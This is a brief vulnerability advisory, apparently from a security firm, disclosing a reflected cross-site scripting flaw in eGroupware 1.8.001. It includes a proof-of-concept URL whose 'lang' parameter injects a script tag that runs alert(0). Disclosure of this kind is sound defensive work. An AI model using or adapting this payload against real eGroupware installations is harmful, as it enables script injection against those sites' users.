Home
Consulting
Exploits
Advisories
Software
Papers
Contact

Vulnerability Advisory

Software Vulnerability
eGroupware 1.8.001 Reflected Cross-site Scripting
Threat Tested On Date
1/5
Windows Vista + XAMPP 4/6/2011
Description
A vulnerability in eGroupware 1.8.001 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E

Copyright © 2016 AutoSec Tools LLC